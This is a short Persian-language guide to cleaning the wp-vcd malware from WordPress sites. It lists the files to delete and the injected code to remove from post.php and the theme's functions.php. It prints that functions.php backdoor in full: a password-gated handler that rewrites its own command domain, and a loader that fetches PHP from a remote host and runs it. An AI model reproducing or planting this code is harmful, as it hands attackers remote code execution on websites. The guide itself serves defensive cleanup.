برای حذف این ویروس یا بد افزار (Malware) اقدامات زیر را انجام دهید:
wp-include
فایل های wp-vcd.php
و class.wp.php
(دقت کنید که دقیقا به این نام باشد) را پاک کنید.wp-include
فایل post.php
را باز کرده و تگ ابتدایی که توسط بد افزار ایجاد شده را پاک کنید. (در صورت وجود)functions.php
موجود در پوشه قالب را باز نموده و تکه کد مشابه زیر را پاک کنید.<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '220c580cc80d7d449f04533fc8f68c79')) { $div_code_name = "wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code9\.php/i', $file, $matcholddomain)) { $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } if (!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (!is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { if ($tmpcontent = @file_get_contents("http://www.*d*o*l*s*h.com/code9.php?i=" . $path)) { function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } extract(theme_temp_setup($tmpcontent)); } } } ?>